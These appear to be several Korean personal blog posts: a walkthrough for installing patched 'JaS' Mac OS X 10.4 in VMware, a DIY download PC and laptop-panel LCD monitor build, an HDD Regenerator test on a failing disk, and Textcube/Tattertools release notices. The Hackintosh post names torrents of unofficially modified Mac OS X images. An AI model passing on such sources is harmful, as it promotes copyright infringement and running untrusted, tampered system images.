하실수 있을듯 합니다. 지금 호스트PC에서 디스크 파티션 타입을 FAT32를 사용하시는분은 거의

없을것이라 생각하지만 만약 FAT32를 사용하는 디스크에서 지정한다면 맨 아래를 선택하셔서

디스크를 2Gb씩 나눠 사용하도록 하시기 바랍니다. 물론 실제 이용시에 디스크 용량은 똑같습니다.

사용자 삽입 이미지

디스크 파일이 저장될 위치를 지정해줍니다. 아까 위에서 Vmware Location을 지정해준 곳과

동일하게 해놓는것이 편합니다.

사용자 삽입 이미지

Customize Hardware를 눌러 약간 수정을 하겠습니다.

사용자 삽입 이미지

혹은 Finish를 눌렀다면 초기화면에서 좌측의 Edit virtual machine settings를 통해 수정을 합니다.

여기서는 플로피 디스크 드라이브를 삭제하겠습니다. 메뉴가 직관적이라 add / remove 버튼을

통해 손쉽게 삭제 가능합니다. Mac에서는 플로피 드라이브를 사용하지 않기때문에 삭제를 해줍니다.

사용자 삽입 이미지

이제 Vmware에서 osx를 설치할 준비가 모두 끝났습니다.

2. Mac OSX 설치

인텔과 AMD CPU모두 왠만한 배포판에서 패치를 지원하는데 개인이 만든 배포판이 많아서 어떤

것은 설치가 안되기도 합니다. 아래의 토런트 파일을 다운로드 하면 세개의 토런트 파일이 있는데

각각 10.4.7, 10.4.8, 10.4.9 버전이 있습니다. 저의 경우는 10.4.9버전을 사용했습니다.

Mac_OS_X_10_4_9_Intel_SSE3_[JaS_10_4_8_AMD_Intel_SSE2_SS.torrent
JaS_Mac_OS_X_10_4_8_AMD_Intel_SSE2_SSE3_PPF_1_Defiant_di.torrent
Mac_OS_X_10_4_7_AMD_Intel_(JaS)_ISO_Repack-(4283690[1][1].2454.torrent


위는 파일 풀네임으로 어떤 패치가 이뤄져있는지 표시되있습니다.


토런트를 잘 모르시는 분들은 간단히 http://utorrent.com 에서 프로그램을 다운로드 받아

다운로드 받은 위의 파일을 클릭하시면 됩니다. 위의 세파일들은 그럭저럭 괜찮은 속도를 보입니다

당나귀나 이뮬처럼 사용자들이 모여있지 않으면 속도가 느리므로 빛의 속도는 기대하지 마시길..

모두 다운로드 하셨다면 Daemon툴등의 가상DVD 에뮬레이터 등을 사용해서 ISO이미지를 넣고

사용하셔도 되고 혹은 Vmware에서 ISO이미지를 직접 사용해서 설치 하시면 됩니다.

(Edit virtual machine settings에서 가능) 이제 Vmware의 상단의 플레이 버튼을 눌러

머신을 가동합니다.

사용자 삽입 이미지

가동시 F2를 눌러 Boot 메뉴에서 CD-ROM으로 부팅가능하게 우선순위를 변경해줍니다.

그뒤 F10을 눌러 저장하고 빠져나옵니다.

사용자 삽입 이미지

다음과 같이 설치 화면이 뜨면 10초가 다 지나기전 esc를 눌러줘야하는데 누르지 않으면

에러가 뜹니다,

사용자 삽입 이미지

이와 같은 에러가 생깁니다. 물론 별 문제 없으니 ctrl+del+insert를 눌러 재부팅 하거나 멈춤버튼을

눌러 껐다 켠뒤 다시 esc를 눌러줍니다.

사용자 삽입 이미지

성공하면 위와 같이 여러가지 읽어들이는 글귀들이 좌라락 뜹니다.

사용자 삽입 이미지

위와같이 설치 초기화면이 떠야됩니다. 당연한 말이지만 만약 뜨지 않고 멈춘다면 커널패닉일수

있는데 이경우 CPU가 설치 ISO에서 지원하지 못해서 일겁니다. 주언어로 한글 사용을 선택합니다.

사용자 삽입 이미지

설치를 준비화는 화면이 뜹니다.

사용자 삽입 이미지

인스톨러 메인화면입니다 컨티뉴 해줍니다.

사용자 삽입 이미지

설치할 디스크를 묻는데 아무것도 안뜹니다 당황할것 없습니다. Vmware의 디스크가 파티션

설정이 되있지 않아서 그럽니다.

사용자 삽입 이미지

위와 같이 상단메뉴에서 선택해줍니다.

사용자 삽입 이미지

위와 같이 처음에 만들었던 VM디스크를 선택해줍니다. 그뒤 오른쪽에서 Partition을 선택해주면

다음과 같은 화면이 뜹니다.

사용자 삽입 이미지

Volume Scheme에서 몇개로 파티션을 나눠줄지 선택하는 메뉴가 뜹니다. 최대 16개의 파티션으로

분할할수 있습니다. 여기서는 단일 파티션으로 1개를 선택했고 Name은 볼륨명이니 마음에 드는대로

써줍니다. 그아래 파티션 유형을 묻는데 맨 처음것을 선택합니다. 그뒤 좌측 하단 부위 Partition을

눌러주면 파티션 설정하면 디스크가 날라간다라고 하는데 알겠어 해줍니다. 모두 끝났으면

창의 빨간 버튼을 눌러 닫습니다.

사용자 삽입 이미지

파티션 생성을 마치고 나면 다음과 같이 볼륨을 선택할수 있게되는데 HDD그림을 누르고

컨티뉴 합니다.

사용자 삽입 이미지

이제 설치할 몇몇 가지를 체크해줍니다 X11은 나중에 설치 가능하지만 그냥 체크해주고 아래에

Jas... Intel이나 AMD둘중 자신의 CPU에 맞게 체크해줍니다. 그리고 대다수의 하드웨어를 지원

가능하도록 Support..을 체크해주고 Nvidia,ATI그래픽 카드를 지원하는 Titan을 체크해줍니다.

인스톨 버튼을 누르면 설치원본을 검증하게 되는데 시간도 오래걸리고 잘못된 이미지라면

어짜피 다시 받는수밖에 없으니 Skip해줍니다.

사용자 삽입 이미지

인스톨을 시작하게 됩니다. 베이스 시스템을 설치하는데에 예상시간 44분이지만 모두 설치하고나면

저의 경우 두시간 넘게 소요됐습니다. 가능하면 성능 좋은 시스템에서 사용바랍니다.;;

설치하는도중 멀티부팅용으로 사용하는 거의 수명이 다되서 골골대던 HDD가 또 말썽을 일으켰

습니다. 최근엔 상태가 더 심각해져서 사용중에 전원을 껏다켠것처럼 힘을 못받다 뻗어버리네요.

결국 이 다음화면부터는 스샷을 찍지 못했지만 인스톨이 끝나면 재부팅 되고 설치 완료입니다.

처음 부팅화면에서 몇가지 설정을 거친후 본 메인화면으로 넘어가는데 이 또한 어려운것이

전혀 없기때문에 넘어가도 괜찮을듯 합니다.

사용자 삽입 이미지

OSX의 부팅화면 역시 깔끔하네요.

사용자 삽입 이미지

꿩대신 닭으로.. 미리 설치해뒀던 레오파드 메인화면입니다.

(내용추가 : 이 VMware이미지는 외국에서 꽤 알려진 pcwiz판 레오파드 VMware이미지를
받은것으로 제가 직접 설치했다는 의미는 아닙니다. 물론 레오파드 플랫이미지로 제가따로
설치는 했었습니다만 지금은 쓰지 않고있네요. 따로 말씀하신분이 있어서 내용을 추가합니다.)


OSX를 Vmware를 통해 설치해서 활용까지 하고 싶으신 분들은 최소한 듀얼코어 CPU를 사용해야

할듯 합니다. 제 시스템에서 설치를 끝마치고 Vmware로 이것저것 해보려고 하면 너무 더뎌서

사용가치가 없었습니다. (P4 2.66Ghz) 그래도 해킨토시를 설치해보고 잠깐 사용해보니 편하긴

편하더군요. 하지만 십수년간 윈도우에 익숙해져서 파일 관리등에 있어서는 리눅스가 익숙하신

분들이 osx를 쓰시면 편할듯 합니다. 실제 시스템 상에서 설치하면 하드웨어가 제각각이라

설치가 실패하는 경우도 생길듯 합니다만 Vmware를 사용한다면 왠만해선 설치에 성공하리라

봅니다. 애플에서는 OSX의 해킹에 대해 하려면 해라식으로 놔두고 있는데 이에 대해서

사용자 의견이 분분합니다. 제 생각에는 뭔짓을 해서든 한번 어렵게 써보고 osx의 편리함을

느껴봐라 맥에서 안쓰니까 하드웨어 설치 잘 안되고 짜증나 죽겠지? 그러니까 맥 사서 써라 라고

하는듯 싶네요. 뭐 어찌됐건 많은 해킨토시 사용자들에 의해 패치가 이뤄지고 있으니

이렇게 한번씩 설치 해보시면 좋은 경험이 될듯 싶습니다.
신고
꽤 전에 남는 부품을 써서 거실에서 사용할 가족용 컴퓨터를 셋팅하고 나서 파워가 나가버려

파워만 얻으려던 중에 꽤 오래전 삼보컴퓨터 미니 타워 본체를 통채로 얻게 됐습니다. 높은 성능을
 
원하는 분들에게는 쓰레기나 다름 없겠지만 저한테는 득템이었죠.ㅋ 파일 다운로더로 쓰기에

그럭저럭 괜찮은 사양이었습니다. (P3 700Mhz) 원래는 케이스까지 모두 그냥 쓰려고 했지만

너무 더럽고 닦아서 써봐야 별로 깨끗할것 같지도 않아서 결국 전부 해체했습니다.

사용자 삽입 이미지

메인보드가 미니ATX이기 때문에 어떻게 써볼까 하다가 집에 남는 합판이 눈에 띄어 쇼트방지를 위해

나사부분에 테이프를 살짝 붙힌뒤 고정시켰습니다. 전원부분이 상당히 지저분해질까봐 걱정했는데

오른쪽 아랫부분에 보이는 기판이 깔끔하게 해결해줬습니다. 램은 남는 PC100 SDRAM을 꽂아서

96Mb로 만들었습니다. 남는 SDRAM이 몇개 더있었는데 PC133램이 제대로 인식되지 않아서

그냥 96Mb로 만족하기로 했습니다.

사용자 삽입 이미지

HDD는 어떻게 할까 생각하다가 뒷판에 케이블 타이로 고정하고 진동으로 빠지지 않게 나사못으로

고정시켜놨습니다. 운영체제만 설치해놓으면 어짜피 다운로더로 쓸것이기 때문에 세컨더리 마스터로

다른 HDD를 연결해서 쓸수있게 했습니다.

사용자 삽입 이미지

파워서플라이는 이미 가족용 컴퓨터로 새로 들어갔기때문에 중고 미니파워를 샀습니다. 주변기기를

많이 연결할일은 없기때문에 300W정도면 충분합니다. 메인으로 쓰는 컴퓨터 파워는 400W인데

HDD 여섯개에 두개의 ODD를 사용하니 힘이 모자란듯 하네요,

사용자 삽입 이미지

이것저것 연결하고 난뒤의 모습입니다. 상당히 지저분 합니다..;; 자작이라 하면 좀 깔끔하게 구상좀

해서 아크릴판이라도 잘라서 제작해야 하겠지만 DIY를 할만한 장비를 사들이기엔 부담스럽기 때문에

이정도로 끝냈습니다. 화면의 경우 다운로더는 RGB케이블을 사용한 아날로그 출력, 본래 시스템은

DVI케이블을 통한 디지털 출력을 사용해서 화면클론으로 번갈아서 볼수있게 해뒀습니다. 여기까지

해두고 보니 뭔가 더 손을 대봐야겠더군요.. 그래서 이다음에 해체한것은 구형 삼성 센스600 노트북

입니다. 원래는 노트북을 사용해서 미니 다운로더를 만들 계획이었는데 노트북이 너무 구형이라

버거워서 계획을 바꿨습니다. 자작에 관심 많으신 분들은 아마 최근에 자작LCD모니터를 보신분들이

많을것이라 생각하는데 저도 패널만 따로 분리해서 만들고 나머지는 일단 보관하려고 생각했습니다.

사용자 삽입 이미지

센스 600이나 예전의 대우 CN530모델의 경우 이처럼 일반 데스크탑 CPU를 꽂을수 있는 소켓이 달려

있어서 보유하시는 분들중에 개조업체를 통해 AMD K7등의 CPU로 업그레이드 하는 분들도 있더군요

바이오스 또한 개조업체에서 변형시켜 CPU를 제대로 인식할수 있게 해줍니다.

사용자 삽입 이미지
MMX 166Mhz CPU입니다. 제 기억에 제가 중학교 2학년쯤해서 MMX CPU가 나오기 시작했던것

같습니다. 지금이야 MMX기술이 기본적으로 모든 CPU에 포함되어있지만 펜티엄 이후

MMX CPU는 획기적인 변화였습니다.

사용자 삽입 이미지

처음 계획했던 안전한 분해는 여기서부터 어긋났습니다. 어짜피 망가져도 그만이다 싶은 생각으로

분해를 해서인지 결국 키보드 필름케이블 접속단자 부분을 망가뜨렸습니다.;; 순간접착제나 글루건

이라도 있으면 케이블을 잘 고정시키고 붙히면 멀쩡하겠지만 그런 도구는 전혀 없었기 때문에

그냥 내버려 뒀습니다.
사용자 삽입 이미지

주목적이었던 LCD 패널을 분리했습니다. 이대로는 아무것도 할수 없습니다. 이렇게 패널을 사용해서

일반 LCD모니터처럼 사용하려면 AD보드,인버터등이 필요합니다.

사용자 삽입 이미지

최근 LCD DIY가 보편화 되면서 꽤 많은 업체에서 AD보드를 판매하고있는데 패널등의 부품들을

구입하기 전에 이렇게 패널 뒷쪽의 모델명을 반드시 확인해서 AD보드가 해당패널을 지원하는지

확인해야합니다. 물론 업체에서 셋트로 판매하는 경우가 많은데 AD보드가 비싼경우가 대부분이기

때문에 따로 구입하시는것이 좋습니다. 다만 저처럼 남는 패널을 이용하는것이 아니라 15인치 이상급

의 제대로 쓸 모니터를 자작하려한다면 좀 비싼 AD보드와 인버터를 구입하시는것이 좋습니다.

제가 사용한 패널의 경우 대부분의 AD보드가 지원을 합니다. (LT121SS-121) 저는 상당히 저렴한

AD보드를 구입했습니다.(2만원 중반대..)

사용자 삽입 이미지

RGB케이블입니다. 2천원주고 구입.. 좀 아깝지만 활용빈도가 높아서 괜찮습니다.

사용자 삽입 이미지

쓰이게 될 패널입니다. 원래 노트북에 쓰이는 인버터등은 전혀 쓸모가 없기때문에 모두 떼버리고

이렇게 패널만 남겨둡니다.

사용자 삽입 이미지

전용 AC어댑터 입니다. 기존에 쓰던 Eee PC의 어댑터를 써도 무방하지만 그냥 하나 구입했습니다.

사용자 삽입 이미지

OSD입니다 가운데가 전원버튼 맨 왼쪽이 메뉴 등등 있네요.

사용자 삽입 이미지

인버터 입니다. 인버터는 액정의 백라이트를 켜기위해 전압을 승압시켜 주는기능을 주로 하는데

그래서 고전압이 흐릅니다. 작다고 우습게 보고 만졌다가는 바로 감전 당합니다. 보호캡이 씌워져서

왔는데 좀 엉성하게 붙혀져서 왔네요.

사용자 삽입 이미지

기존의 인버터가 연결되있는 모습입니다. 물론 제거해야됩니다. 돌출 부분이 있는곳이 앞부분이고

반대로 연결은 잘 되지 않지만 연결할경우 백화현상이 일어날수 있습니다.

사용자 삽입 이미지

LVDS케이블 입니다. 통신방식에 따라 TTL형식도 있습니다. 케이블 모양은 틀리기 때문에 자신의

패널이 LVDS를 쓰는지 TTL을 쓰는지 확인한뒤 구입해야 합니다.

사용자 삽입 이미지

원래 연결되어있던 패널부분 케이블입니다. 양 옆부분을 송곳등으로 살살 바깥쪽으로

밀어주면 금방 빠집니다.

사용자 삽입 이미지

패널과 LVDS케이블을 연결뒤 인버터를 연결합니다. 그뒤 RGB케이블 연결후에 전원 어댑터를

꽂습니다. 전원부터 이어놓고 작업을 하면 쇼트가 일어나 패널 및 모든 부품을 망가트릴수 있으니

마지막에 전원을 연결하는것이 좋습니다. 전체적으로 대충 모양새를 갖추기 전에 시험 구동해본

모습입니다. 이 패널은 800*600의 해상도를 지원하고 압축해상도로 1024*768을 지원합니다.

물론 압축해상도를 사용하면 글자보기가 조금 힙듭니다. 이는 컴퓨터가 인텔그래픽칩셋을 사용

한다면 Eee PC 포럼에서 한 사용자가 만든 As Tray를 사용해서 해결할수 있습니다.

사용자 삽입 이미지

이것또한 아크릴판 몇장만 사용해도 깔끔하게 만들수 있을것을 있는것만 가지고 억지로 만드려고

하고있습니다.. 작업중인 책상의 모습..

사용자 삽입 이미지

그냥 가연결만 하고 쓰다보면 정전기 등으로 쇼트가 일어나 망가질수 있기때문에 원래 패널의

케이스를 사용하기로 했습니다. LVDS 케이블이 빠져나올곳에 커터칼을 불로 달궈서 파냈습니다

송곳을 사용했다면 헐렁하지도 않고 괜찮을 뻔했는데 생각을 미쳐 못해서.. 이미 망했습니다.

사용자 삽입 이미지

완전히 파낸 모습입니다. 너무 지저분 하네요 -0- 개는 옆에서 주인이 고생을 하던말던 잠 퍼잡니다.

사용자 삽입 이미지

왼쪽에 인버터 전선이 빠질 구멍을 뚫어 지지대속으로 집어넣어 고정을 시켰습니다.

사용자 삽입 이미지

AD보드와 인버터를 뒷판에 고정시키기 위해 송곳을 불로 달궈 뚫었습니다. 글루건만 있었어도

이고생 안했을듯 ㅡㅡ; 참고로 글루건이 없으신 분들은 문구점에서 목공용풀을 사용하면 됩니다.

마르는데 조금 오래걸리긴 하지만 마르고 나면 실리콘이 마른것처럼 제대로 고정됩니다.

사용자 삽입 이미지

이렇게 뒷판 구멍을 통해 케이블타이를 통해 모두 연결 했습니다. 여기서 한가지 문제가 생겼는데

왼쪽에 보이는 검은색 케이블이 통신을하는 LVDS케이블 입니다. 패널에 연결되는 부위는 작은

단자가 있는데 이곳에 연결된 전선 하나가 압력을 받아서 빠져버렸습니다. 전선을 약간 따서

얇게 만들어서 겨우겨우 꽂아놓았지만 불안불안 합니다. 다시 빠지게 되면 납땜이라도

생각을 해봐야겠죠.

사용자 삽입 이미지

가조립후 테스트 중입니다. 왼쪽 지지대 부분을 조금 약하게 고정시켜 빠지지 않을정도만

조여놨습니다.

사용자 삽입 이미지

거의 다 해놓고 보니 OSD배치를 까먹었었습니다. 이 또한 송곳,케이블 타이를 사용해서 윗쪽에

고정시켰습니다.

사용자 삽입 이미지

뒷판 모습입니다. 조립과정은 거의 다 끝났습니다. 나름 깔끔하게 고정됐다고 생각하는데 PCB가

완전 노출되있다 보니 쇼트가 일어날 위험이 있어서 겉에도 케이스를 씌워야겠다 생각이 들었습니다.

사용자 삽입 이미지

며칠전 삼겹살 먹으려고 샀던 상추 케이스를 잘라서 덮개로 사용했습니다. 이것또한 고정은 케이블

타이로 했습니다.

사용자 삽입 이미지

벽에 못으로 박고 역시 케이블타이로;; 매달아 놨습니다. 상당히 지저분 하네요. 만들어진 LCD는

다운로더 컴퓨터에 연결 되어있습니다.

사용자 삽입 이미지

정면에서 본 모습입니다. 여건이 된다면 아크릴판을 잘라서 본체와 모니터를 잘 정리해봐야겠습니다.

이렇게 남는 패널로 저렴하게 모니터를 만들고 나니 기분이 좋네요. 패널의 경우 새물건은 상당히

비싼 편이니 혹시 만드실분들은 주변에 버리는 노트북이나 재활용센터등에서 찾아보시면 괜찮은

패널을 가진 노트북이 많을것이라 생각됩니다. 대신 큰 화면의 LCD를 자작하실 분들이라면

잘 생각하셔야 합니다. 패널가격도 그렇고 AD보드등도 비싸집니다. 미니 PC등을 자작하고

싶으신 분들이라면 이렇게 시도해볼만 하다고 생각합니다.
신고

글쓰기에 앞서 야동 야사키워드가 순위권 밖으로 밀려나서 내심 서운(?) 했는데 요새 다시
10위권 내로 진입하고 있네요 ㅋㅋㅋ 근데 누나 레깅스는 왜찾아 ㅡㅡ;

어쨋든..

요새 HDD들은 여간 큰 충격을 주거나 디스크 액세스를 많이 하는작업(프루나 혹은..이뮬,이동키

등..)을 과도하게 많이 하지 않는이상은 워낙 성능이 좋아져서 여간해선 배드섹터가 생기지 않습

니다. 배드섹터가 무엇인지에 대해서는 인터넷 찾아보면 금방나오니..여기선 생략하고 논리적인

배드섹터가 생겼을때 데이터를 파괴하지 않고 복구할만할 쓸만한 유틸리티가 있습니다. 지금 소

개하는 HDD Regenerator가 그것인데 물리적 배드섹터는 어떠한 유틸리티로도 해결이 불가능 한

점을 유념하시기 바랍니다. 대신 이경우에 HDD검사 유틸리티로 배드섹터 부분을 검색하여 파티

션 유틸리티를 사용해 해당섹터들을 하나의 드라이브로 할당한뒤 나머지 부분만 활성화 시켜서

손상된 부분을 액세스 하지 않게 하는 임시방편은 있습니다. 논리적 배드섹터의 경우의 복구는

매우쉽습니다. 이는 정말로 손상이 가해진것이 아니기 때문에 이경우 로우레벨 포맷을 해주면

됩니다. 대부분의 로우레벨 포맷 유틸리티는 도스상에서 실행을 하는데 윈도우용은

http://hddguru.com
에 가시면 쉽게 구할수 있습니다. 로우레벨 포맷은 일반적으로 하는 포맷

과는 다른형식이며 섹터를 재배치 하기때문에 디스크에 무리를 많이 줍니다. 가능하면 로우레벨

포맷은 하지 않는것이 좋습니다. 어쨋건.. 이번에 이 유틸리티를 쓰게된 이유는 세컨드컴에서

쓰는  HDD 한대가 자꾸 데이터 손실이 생기고 파일을 저장하지 못해서였는데 이번해 여름에

컴퓨터가 엎어지면서 충격이 컸나봅니다. Sea모사의 HDD는 멀쩡한데 SAM모사의 HDD는 바보

가 됐네요. 사실 용량도 두개다 각각 4Gb밖에 안되서 별로 쓸모는 없지만 그래도 다운로드 전용

으로 잘 써먹으려고 했는데 쪼금 실망하긴 했습니다. 그렇다고 새로 한개 사기는 그렇고 해서

배드섹터 잡아보자 마음먹고 HDD Regenerator를 사용했습니다. 사용법은 별것 없습니다.

그냥 ISO파일을 시디로 굽거나 해서 부팅하면 드라이브를 선택하라고 하고 선택하면 검사하고

알아서 수정합니다.;;

(주의사항 : 검사시에 엄청난 시간이 소요됩니다. 잘 생각해보시고 실행결정 하세요 ;;)

아래 사진들은.. 검사하는데 얼마나 시간이 오래 걸리는지를 보여줍니다..ㅡㅡ;

사용자 삽입 이미지

08.1.11(금) 11:00 AM 이전에도 대략 두세시간은 검사한듯.. R은 복구가 된것인데 아마
배드섹터가 발생한 도입부는 살짝만 긁힌듯 합니다.

사용자 삽입 이미지
어떤유형의 파티션이나 포맷되지 않은 디스크에서도 사용가능합니다. FAT,FAT32,Linux,NTFS
모두 가능합니다.


사용자 삽입 이미지
08.1.11(금) 08:07PM 아침 여섯시 정도 부터 시작한것 같은데 이제 2.2Gb 검사했군요. 여기까지
배드섹터가 발생하는것으로 미뤄봐서 다 망가졌을꺼라 예상은 했습니다.ㅋㅋㅋ 그래도 이왕한것
끝까지..

사용자 삽입 이미지
08.1.11(금) 9.26PM 세컨컴이 팬소리도 그렇고 너무 시끄러워서 이쯤에서 그냥 꺼버릴려고
하다가 한번 더 참느라 찍었습니다..


사용자 삽입 이미지
08.1.11(금) 10:42PM 이때도 고비였죠..ㅋㅋ

사용자 삽입 이미지
08.1.12(토) 03:04AM 할말을 잃게 합니다. ㅋㅋㅋ 벌써 하루가 지나버렸네요.. ㅋㅋ

사용자 삽입 이미지
08.01.12(토) 05:13AM 드디어 완료 ㅜ_ㅜ 몽창 배드섹터가 생겼습니다. ㅋㅋㅋ 예상은 했었습니다만..;; 원래는 이렇게 스캐닝이 끝난뒤에 복구작업을 시작하는데 다 망가졌기때문에 그 작업도
전혀 되먹질 않았습니다. 슬쩍 화가난 저는..


사용자 삽입 이미지
HDD를 분해하기로 했습니다. 원래도 항상 고장난 HDD는 원형그대로 둬본적이 없군요. 모두
한번씩 뜯어봅니다. 제일 뜯기 쉬웠던 HDD는 예전에 후지쯔 8Gb HDD였던것 같습니다..
삼성 HDD도 뜯기 참 쉽습니다. 위의 두개의 나사와 겉부분 나사만 잘 풀어주면 그냥 뚜껑이
열립니다.

사용자 삽입 이미지
코마상태인 HDD ㅋㅋ 거울처럼 빤딱거리는 것이 플레터 입니다. 이곳에 데이터가 저장됩니다.
HDD는 이렇게 뜯어도 잘 작동합니다. 하지만 미세한 먼지입자들이 헤드에 걸리면 그만큼 물리
적 손상이 가해질 위험이 높기때문에 그렇게 쓰지 않는것 뿐이죠. 하나 버리는셈 치고 겉케이스
튜닝해보는것도 꽤나 즐거울듯 합니다. ㅋ


사용자 삽입 이미지
이제껏 고장난 HDD들을 분해하면서 한번도 안해봤던 담배연기는 HDD에 얼마나 해로운가를 실험 해봤습니다.;; 별반응 없어서 관뒀습니다. 헤드가 상당히 빨리 움직이기 때문에 흔들려서 찍히는군요. 이외에 입김불어넣기도 몇번 했습니다. 겨울에 혹시라도 자연의 힘을 빌어 쿨링하신다고 베란다에 내놓고 쓰거나 하시는 분들.. 뚜껑이 밀봉된 HDD라도 치명적입니다. 조심하시길..

이작업을 모두 끝낸결과 사망판정 내렸습니다. 일반 포맷은 아예 되지도 않을뿐더러 위의 리제네레이터에서 봤던 앞부분 상하지 않은 부분마저 HDD뚜껑을 열고 가혹행위했더니 다 망가진듯 합니다. 어쨋든.. HDD Regenerator는 괜찮은 툴임에는 분명하지만 요새 나오는 HDD들이 워낙에
고용량이다 보니 이작업을 한다면 몇일이 소요될지 생각만해도 끔찍합니다. 여담이지만 요새는
삼성에서 1TB(1000GB) HDD도 출시됐더군요. HDD관리들 잘하시기 바랍니다. 무리한 P2P
프로그램 사용을 자제하시는것이 HDD건강에 좋습니다.
신고
사용자 삽입 이미지
6월 29일부로 태터툴즈에 이은 Textcube가 알파페이즈를 지나 베타페이즈로 들어갔습니다. 로고

디자인도 상당히 산뜻하네요. 플러그인들의 경우 원문을 읽어보면 태터 1.1.x 버전에서 적용 되던

것들이 제대로 작동하지 않을 가능성이 매우 큽니다. 저는 데이터를 모두 백업후 로컬테스트용 서버

에 설치해볼 생각입니다. 텍스트큐브는 태터툴즈와 디렉토리 구조가 다릅니다. 공지에서는 설치시

백업은 필수이며 blog,lib,script,style,component,language 디렉토리를 삭제한뒤 설치후 블로그

주소끝에 /checkup 을 입력해서 체크업 하는것을 권장하고 있습니다. 기존의 태터툴즈에서 XML

데이터 백업/복구가 제대로 지원이 되는지는 언급이 없네요. 일단 테스트 해봐야 겠습니다.

(07.7.3 간단테스트 결과 : 알파버전에서 되지 않았던 하위버전(태터툴즈1.x)의 데이터들이 XML
형식으로 복원이 됩니다. 처음에 XML로 하지 않고 테스트 설치시에 Mysql 텍스트큐브 테이블을
모두 지워버리고 새로생성 한뒤 기존의 태터툴즈를 그대로 복사하여 복원을 시도한 탓 인지 본문에
첨부된 이미지 파일들이 복구가 되지 않는 문제가 있었는데 이는 곧 해결되지 않을까 싶습니다.)


아래는 공지사항 원문입니다.

---------------------------------------------------------------------------

텍스트큐브 1.5의 첫번째 베타를 공개합니다.

(2007.6.30) 설치시 환경에 따라 발생하는 데이터베이스 생성 오류를 수정한 버전으로 업데이트 되었습니다.


주의할 점

업그레이드에 관련하여

텍스트큐브 1.5의 경우 태터툴즈 1.1 버전과 외양은 비슷하지만 코드와 데이터베이스 구조부터 동작 방법까지 내부적으로 굉장히 많은 변화가 있었습니다. 따라서 꼭 이 점을 유의해 주세요. 데이터베이스의 구조를 상당히 많이 바꾸기 때문에 텍스트큐브로 업그레이드 한 후 태터툴즈 1.1.3으로 돌아가는 것은 불가능합니다. 테스트 목적으로만 사용해 주시기 바랍니다.

에디터 모듈에 관련하여
기본 에디터는 HTML raw 에디터입니다. 기존에 사용하던 위지윅 에디터를 사용하거나, 위지윅 에디터로 작성된 글을 보기 위해서는 '플러그인'의 모듈 카테고리에서 위지윅 에디터 모듈과 TTML 파서 모듈을 사용함으로 변경하여야 합니다.

이후의 베타에서는 최소 모듈 개념으로 자동으로 동작하게 될 것입니다.

플러그인 사용과 제작에 관련하여
플러그인의 경우 기존의 misc::getUserSetting / misc::setUserSetting 이 모두 misc::getBlogSetting / misc::setBlogSetting으로 변경되었습니다. 1.1의 플러그인을 사용하기 위해서는 위 호출을 모두 변경해 주셔야 합니다. 또한 index.xml의 requirement 필드에
<textcube>1.5</textcube>
와 같이 반드시 사용 가능한 최고 버전을 명기해 주셔야 합니다.

또한 현재 블로그의 id를 의미하던 $owner는 더이상 사용되지 않습니다. 1.5에서는 레거시 지원을 위하여 남아있지만 이후 현재 블로그 id를 의미하는 $owner는 모두 getBlogId()를 통해서 얻어야 합니다.


피드백

1.5의 안정화를 위하여 많은 피드백이 필요합니다. 버그나 소스에 대한 피드백은 버그 보고 게시판을 통해 부탁드립니다. 또한 소스를 개선하신 경우 위 게시판을 통해 변경된 점을 (diff등을 통하여) 제공해 주시거나, dev at tattersite dot com 으로 보내주시기 바랍니다.

sandbox 접근 권한과 커밋을 필요로 하시는 분 또한 위의 메일 주소로 메일을 보내 주시기 바랍니다.

지역화 작업

지역화를 위한 po파일은 언어 리소스가 어느정도 고정되는 베타 2나 3 이후에 갱신할 예정입니다.

내려받기
이 링크를 통해 내려받으실 수 있습니다.
신고
테터툴즈 1.1.2.2 : Animato 에 이어서 테터툴즈 1.1.3 : Transition이 오늘 공개 되었습니다. 이제 이

1.1.3버전 이후로는 1.5버전인 Textcube가 대체하게 될텐데요. 1.1.3 버전에서 달라진 점은 아래

공지사항과 같습니다. 테터툴즈란 이름으로 블로그를 처음 시작했던 분들에게는 '마지막' 이라는

단어가 왠지 서운하기도 하겠네요. 설치방법은 기존과 동일하게 덮어씌우고 관리자 모드에 들어가서

점검 버튼 한번만 눌러주면 끝납니다.

이하는 공지사항 원문입니다.

----------------------------------------------------------------

태터툴즈의 마지막 버전인 '태터툴즈 1.1.3: Transition' 을 공개합니다.


안내
이후 태터툴즈는 '텍스트큐브Textcube'로 이름이 변경됩니다. 태터툴즈는 ttxml을 통한 데이터 교환 및 '정보 소유권'을 보장하는 프로그램들의 모임으로 구성되는 프로젝트 이름이 됩니다. 관련 안내


태터툴즈 1.1.3은 텍스트큐브 1.5를 개발하는 과정에서 수정되거나 개선된 점을 반영하여 만들어 졌습니다.

변경점
1.1.3에서 달라진 점입니다.

다음의 버그들이 수정 되었습니다.
  • 보관 글 출력시에 스킨의 index.xml 에서 설정한 값을 따라가지 않는 부분이 수정되었습니다.
  • 데이터 복원시 복원하는 태터툴즈에 사이드바 플러그인이 없는 경우에도 백업 파일에 따라 플러그인이 있는 것 처럼 자동으로 로딩되는 문제가 수정 되었습니다.
  • MS internet explorer에서 첨부파일을 다운로드한후 바로 실행하기를 선택할 경우  cache-control 때문에 실행되지 않는 문제를 수정하였습니다.
  • 사이드바 설정 화면에서 플러그인을 처리할 때 사용하지 않는 핸들러가 경고 기록을 남기는 문제를 수정하였습니다.
  • 피드 통계 플러그인을 처음 작동시킬 경우 잘못된 구조의 테이블을 만드는 오류를 수정 하였습니다.
  • RSS를 출력할 때 이미지 경로가 상대 경로로 출력되어, 피드 구독기에 따라 이미지가 제대로 보이지 않을 수 있는 부분을 수정하였습니다.

또한 다음의 동작들이 변경 되었습니다.
  • 댓글 알리미 검색 결과가 최근 시간순으로 정렬되어 보여집니다.
  • 블로그 속도 향상을 위하여 스팸 필터 처리를 사용자가 접속할 때 마다 실행하지 않고, 하루에 한 번만 휴지통을 비우도록 변경하였습니다.


스킨 매니저 안내
버그 패치와 몇가지 개선점 말고도 변화가 하나 있습니다.
1.1.3 확장팩에는 '스킨 매니저' 플러그인이 추가되었습니다.

스킨 매니저는 TNC에서 개발하고 TNC/TNF에서 관리하는 플러그인입니다. 기존에 스킨 게시판에서 스킨을 내려 받아 설치하는 과정을 대폭 줄여줍니다. 스킨 매니저에서 스킨을 골라 자동으로 내려 받아 설치하도록 할 수 있으며, 내려 받은 스킨의 구조나 파일 편집등을 편리하게 할 수 있습니다.


사용을 위해서는 관리자 메뉴의 '플러그인' 페이지에서 '스킨 매니저'를 사용함으로 선택해 주시면 됩니다.

플러그인은 1.1.3과 1.1.2.2 에서 동작합니다. 이외의 버전에서는 테스트가 완료되지 않았습니다.

